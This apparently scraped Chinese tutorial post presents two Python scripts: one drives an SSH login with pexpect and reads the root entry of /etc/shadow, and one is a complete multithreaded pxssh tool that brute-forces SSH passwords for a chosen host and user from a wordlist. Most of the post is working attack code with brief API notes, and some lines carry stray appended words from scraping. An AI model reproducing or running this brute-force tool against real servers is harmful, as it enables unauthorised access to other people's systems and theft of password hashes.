Pexpect 模块登陆ssh以及pxssh模块暴力破解ssh密码
利用Pexpect模块交互
这里centos系统python
代码
# -*- coding: utf-8 -*-
# @Author : Lan126
import pexpect
PROMPT = ["# ", ">>> ", "> ", "\$ "]
def connect(user, host, password):
ssh_newkey = "Are you sure you want to continue connecting"
connStr = "ssh " + user + "@" + host
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, ssh_newkey, "[p|P]assword:"])
if ret == 0:
print("[-] Error Connecting")
return
if ret == 1:
child.sendline("yes")
ret = child.expect([pexpect.TIMEOUT, "[p|P]assword:"])
if ret == 0:
print("[-] Error Connecting")
return
child.sendline(password)
child.expect(PROMPT)
return child
def send_command(child, cmd):
child.sendline(cmd)
child.expect(PROMPT)
print((child.before).encode("utf-8"))
def main():
host = "localhost"
user = "root"
password = "*************************"
child = connect(user, host, password)
send_command(child, "cat /etc/shadow | grep root")
if __name__ == "__main__":
main()
结果图
细节
下面是从Pexpect文档中复制的一句话基本上能够归纳这一个脚本的全部知识点了express
There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected patterncentos
spawnclass的做用以下app
This is the main class interface for Pexpect. Use this class to start and control child applications.ssh
利用pxssh暴力破解ssh密码
这里也是centos系统xss
代码
# -*- coding: utf-8 -*-
# @Author : Lan126
import optparse
from pexpect import pxssh
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print("[+] Password Found " + password)
Found = True
except Exception as e:
if "read_nonblocking" in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif "synchronize with original prompt" in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>")
parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
parser.add_option("-u", dest="user", type="string", help="specify the user")
parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
options, args = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwordFile
user = options.user
if host is None or passwdFile is None or user is None:
print(parser.usage)
exit(0)
fn = open(passwdFile, "r")
for line in fn.readlines():
if Found:
# 若是发现了密码就退出
print("[*] Exiting: Password Found")
exit(0)
if Fails > 5:
print("[!] Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip("\r").strip("\n")
print("[-] Testing: " + str(password))
t = Thread(target=connect, args=(host, user, password, True))
t.start()
if __name__ == "__main__":
main()
结果图
细节
这其实也是上面那个脚本的更高级的封装不过就是加了一个读取密码文件的过程而已
这一个脚本的知识点有全局变量,信号量,以及pxssh模块的使用,它能够直接用login()等函数与ssh交互
BoundedSemaphore类了解一下函数
A bounded semaphore implementation. Inherit from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.ui
- 1. python—用Pxssh暴力破解SSH密码
- 2. python3 暴力破解SSH密码
- 3. Linux 系统防止ssh登陆密码的暴力破解
- 4. python自动登陆SSH(暴力破解局网LINUX服务器登陆密码)
- 5. 防止ssh暴力破解linux密码
- 6. ssh暴力破解
- 7. linux防暴力破解登陆密码
- 8. 2.ssh**登陆(ssh无密码登陆)
- 9. Java SSH框架登陆注册模块
- 10. fail2ban防暴力破解-ssh防爆力登陆
- 更多相关文章...
- • Lua 模块与包 - Lua 教程
- • DTD - XML 构建模块 - DTD 教程
- • 委托模式
- • Flink 数据传输及反压详解
-
每一个你不满意的现在,都有一个你没有努力的曾经。